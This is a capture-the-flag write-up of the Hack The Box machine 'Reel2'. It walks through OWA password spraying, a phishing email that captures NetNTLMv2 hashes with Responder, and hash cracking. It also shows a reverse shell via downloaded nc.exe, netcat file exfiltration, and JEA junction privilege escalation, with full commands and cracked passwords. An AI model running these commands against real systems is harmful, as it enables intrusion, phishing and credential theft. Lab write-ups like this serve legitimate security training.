Introduction@Reel2:~$
Column | Details |
---|---|
Name | Reel2 |
IP | 10.10.10.210 |
Points | 40 |
Os | Windows |
Difficulty | Hard |
Creator | cube0x0 |
Out On | 03 Oct 2020 |
Summary
-
Nmap
shows the 3 Ports open. -
Gather all the
user name
in a txt file. - Valid login Creds Obtianed
-
login to OWA in
https://10.10.10.210/OWA
-
Found k.svensson hash
with help of
Phising
-
Cracking the obtained ntml hash and get the password
kittycat1
-
Login to the machine with the
PSSession
- Getting
user.txt
-
looking at the
000003.log
the password for thejea_test_account
is enumerated -
Found the password of
jea_test_account
In log file -
Looking at the basic
jae_test_account.psrc
and .pssc the Check-File commad loads if the contents are fom the"C:\ProgramData"
. -
Create a
Symlink
-
Using
Check-File
command to enumerate. -
Get
root.txt
Pwned
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #nmap -sC -sV -oA nmap/result 10.10.10.210
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-10 09:48 EDT
Nmap scan report for 10.10.10.210
Host is up ( latency).
Not shown: 991 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp open ssl/https?
|_ssl-date: 2020-10-10T04:27:32+00:00; -9h23m25s from scanner time.
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -9h23m25s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address ( host up) scanned in 213.23 seconds
So basically Three ports are opened
80:http
and 443:https
8080:http-proxy
Port-80
Enumerating http But He Said 403-Forbidden
Enumerating HTTPS
.
Let's use gobuster to find Directories
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.210
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/10 10:04:31 Starting gobuster
===============================================================
/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)
Let's Go to /owa
First
Hmmm , a login page. Let's Try somesql injection
But nothing is work
.
Port-8080
Lets Create A Account On SignUp
Page.
Hmm.. In Home Page There Are So Many Users
Let's Gather All Users and Create A user.txt
Example:
1
2
3
sven
svensson
s.svensson
If We See All Posts In The Posts Tab, The svensson
user post gave us a hint This summer is so hot!
So, Let's Create A pass.txt
with this hint
.
1
2
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #cat /usr/share/wordlists/rockyou.txt | grep Summer > pass.txt
With the user.txt
and pass.txt
, lets bruteforce the OWA
login
But We Don't bruteforce OWA
login with wfuzz and hydra. we need to install a tool called SprayingToolkit
.
Link
: SprayingToolkit
But, Before Running this tool install the requirements
of this tool.
1
pip3 install -r requirements.txt
Now, Let's run the tool
1
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
and after a couple of minutes
we got the username
and password
.
s.svensson
Password
= Summer2020
Let's Login
With This credentials
on port 443
Hmm, site is on another language
. Let's open it in chromium
so we will understand
what's going on.
Now I understand what's going on here it's a mail
server i think we need to do some Phising
stuff.
If you don't known about that here is an interesting
article.
Link
: NetNTLMv2 hash stealing using Outlook
So what we can do now compiling
a new message
message
.
2. Select all user with Control+A
then click on To
button on bottom. So this will send our email
to each and every user .
3. Give the subject
as you wish and in the body
enter your htb
ip like http://10.10.XX.XX
Important
: Before Sending this email start your responder
.
1
responder -I tun0
Boom, After couple of minutes
we get the response back.
But first we need to crack this hash
. But first identify
what type of hash is this.
So Now we known this is NTLMv2 Hash
hashcat
example hashes
Link
: Example hashes
So Now we known this hash
is a crackable
hash. So Let's Crack
it
1
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
And we crack the hash
.
username
= k.svensson
password = kittycat1
Evil-WinRm
is not work at this situation because port 5985
is not open.
So we using Linux Powershell
to login.
But First Install powershell for Linux
1
2
sudo apt install gss-ntlmssp
sudo apt-get install powershell
After installation
you can access powershell with pwsh
.
Now, Let's login with pwsh
.
1
2
3
4
5
6
7
8
9
10
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #pwsh
PS /root/Desktop/HTB/reel2 > $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
PowerShell credential request
Enter your credentials.
Password for user k.svensson: *********
PS /root/Desktop/HTB/reel2 > Enter-PSSession $offsec_session
[10.10.10.210]: PS>
Now commands like dir
, ls
, cd
, whoami
wont work. $env:username
and $env:domainname
works.
We need to Execute
powershell commands with the script
block
Link
: behavior of Out-Default
So we use &{ command }
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[10.10.10.210]: PS> &{ cd ../Desktop }
[10.10.10.210]: PS> &{ ls }
Directory: C:\Users\k.svensson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/30/2020 1:19 PM 2428 Sticky Notes.lnk
-ar--- 10/9/2020 7:21 AM 34 user.txt
[10.10.10.210]: P> &{ type user.txt}
Now, let's change this interface
to shell interface for that we need to transfer a nc.exe
file and get a reverse
shell.
1. open a simple http
server But i use apache2
service.
2. transfer nc.exe
to the system
netcat
listener.
1
2
3
[10.10.10.210]: PS> &{ iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
[10.10.10.210]: PS> &{ cd 'C:\Windows\System32\spool\drivers\color\'}
[10.10.10.210]: PS> &{ ./nc.exe 10.10.xx.xx 9001 -e powershell.exe}
Let's check our netcat
listener
Boom guys, we got the shell
now we don't use this command &{ }
,
Now the reverse shell is obtained. It's time for Enumeration.
We Found nothing in our Enumeration
proccess Let's check the log if anything interesting
there.
1
2
cd /
dir /s /b *.log
they show us 000003.log
file in our current user directory Let's get on that.
but when we use type command
to see inside 000003.log file it's give me gibberish
.
So we need to get that file
in our local machine
.
So we use nc.exe
to transfer the file.
1. open a listener
in your local machine to get the file content
.
1
nc -nvlp 1234 > 000003.log
2. In the window
reverse shell type this command
.
1
2
3
PS C:\> cmd
C:\> cd "C:\Windows\System32\spool\drivers\color\"
nc.exe 10.10.XX.XX < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"
Let's check our netcat
listener.
Let's use our strings
command to see content in 000003.log
file.
We got the username and password
jea_test_account
password
= Ab!Q@vcg^%@#1
Privilege escalation
Looking at the basic jae_test_account.psrc
and .pssc
the Check-File commad loads if the contents are fom the "C:\ProgramData"
.
So what we can do we need to create a Symlink
to ProgramData
directory with Administrator
directory.
Important
: be sure you run this command
in PS
1
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
Now command will Executed
successfully.
So when we login with jea_test_account
account we can access Administrator
directory also.
Now we need to login with jea_test_account
account. So let's open a new terminal
and type pwsh
.
command
one by one.
1
2
3
4
5
6
7
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #pwsh
PS /root/Desktop/HTB/reel2 > $username = "jea_test_account"
PS /root/Desktop/HTB/reel2 > $password = ConvertTo-SecureString"Ab!Q@vcg^%@#1"-AsPlainText-Force
PS /root/Desktop/HTB/reel2 > $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
PS /root/Desktop/HTB/reel2 > Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate
[10.10.10.210]: PS> Check-File C:\programdata\root\Desktop\root.txt
And we pwned it …….
If u liked the writeup.Support a Student to Get the OSCP-Cert
Donation for OSCP
Resources
Topic | Url |
---|---|
SprayingToolkit | https://github.com/byt3bl33d3r/SprayingToolkit |
NetNTLMv2 hash | https://www.ired.team/offensive-security/initial-access/netntlmv2-hash-stealing-using-outlook |
Example hashes | https://hashcat.net/wiki/doku.php?id=example_hashes |
behavior of Out-Default | https://stackoverflow.com/questions/18082746/can-you-change-the-...... |